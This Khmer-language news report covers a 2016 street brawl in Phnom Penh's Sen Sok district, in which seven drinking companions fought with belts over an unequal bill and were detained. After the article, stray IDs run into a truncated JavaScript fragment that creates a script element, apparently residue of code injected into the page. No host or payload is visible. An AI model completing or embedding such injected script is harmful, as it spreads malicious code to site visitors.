ព្រឹតិ្តការណ៍ថ្មីៗ

ផឹកស៊ីចេញលុយមិនស្មើ វ៉ៃប្រាវ រត់ព្រាតតាមដងផ្លូវ សមត្ថកិច្ចឃាត់ខ្លួន៧នាក់

3 ឆ្នាំ មុន 16 តូ សុផល

ភ្នំពេញ ៖ ក្រុមក្មេងទំនើង៧នាក់ចេញពីផឹកសុីតុតែមួយសោះឈ្លោះគ្នារឿងចេញលុយមិនស្មើគ្នាហើយបានបង្កហឹង្សាតាមផ្លូវ ត្រូវសមត្ថកិច្ចឃាត់ខ្លួន៧នាក់។

ហេតុការណ៍នេះបង្កអោយមានការភ្ញាក់ផ្អើលនៅវេលាម៉ោង ២៣និង៣០នាទីយប់ថ្ងៃទី២ខែវិច្ចិកា ឆ្នាំ ២០១៦ត្រង់ចំនុចក្បែរក្លោងទ្វារច្រកចូលវត្តសំរោងអណ្ដែត ស្ថិតតាមផ្លូវវត្តសំរោងអណ្ដែត សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ។

តាមប្រភពព័ត៌មានពីកន្លែងកើតហេតុបានអោយដឹងថាមុនពេលកើតហេតុគេឃើញក្រុមក្មេងស្ទាវមួយក្រុមគ្នា៧នាក់ជិះម៉ូតូបីគ្រឿងចេញពីហាងផឹកសុីមួយកន្លែងជិតវត្តសំរោងអណ្ដែត ហើយលុះមកដល់ចំនុចកើតហេតុស្រាប់តែឃើញអ្នកទាំងអស់នោះដោះខ្សែក្រវ៉ាត់វៃគ្នាពេញផ្លូវយ៉ាងភាពអនាធិបតេយ្យទើបប្រជាពលរដ្ឋនៅម្ដុំនោះបានទាក់ទងទៅកាន់សមត្ថកិច្ចខណ្ឌសែនសុខសហការជាមួយកម្លាំងក្រុងចុះមកធ្វើការបង្ក្រាបទាន់ពេលវេលា ។

ក្នុងនោះឃាត់បានមនុស្សចំនួន៧នាក់និងម៉ូតូ៣គ្រឿងនិងនាំអ្នកទាំងអស់នោះយកទៅសួរនាំនៅប៉ុស្ដិ៍នគរបាលរដ្ឋាបាលភ្នំពេញថ្មី បើតាមការផ្ដល់ព័តមានពីក្រុមក្មេងស្ទាវខាងលើបានអោយដឹងថាពួកគេទើបតែចេញមក ពី ហាងផឹកសុីមួយកន្លែងយីហោ ចរណៃ នៅជិតរបងវត្តសំរោងអណ្ដែត ក្រោយមកពួកគេបានចេញពីហាងខាងលើហើយដោយសារតែពេលផឹកសុីគ្នីគ្នារបស់គេបានប្រកែកគ្នារឿងចេញលុយមិនស្មើគ្នាហើយនិងរឿងញ៉ែស្រីរបស់ពួកម៉ាកខ្លួនក៍មានការគំគួនហើយពេលចេញមកក្រៅទើបបង្កជាហិង្សាយកខ្សែក្រវ៉ាត់ដេញវៃគ្នាតាមផ្លូវដូច្នោះ។

 

បច្ចុប្បន្នអ្នកទាំង៧នាក់កំពុងតែធ្វើការអប់រំណែនាំនៅប៉ុស្ដិ៍នគរបាលរដ្ឋាបាលភ្នំពេញថ្មីនិងហៅសាច់ញាតិអោយមកធានាយកត្រលប់ទៅផ្ទះវិញ៕

b67237da-4eda-43de-9b8b-05fb78e0cfb2 e0efd3a8-93e7-4cd7-8029-e0da57a3fa1e f0067e90-e495-492a-ba98-b5d85602091fvar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ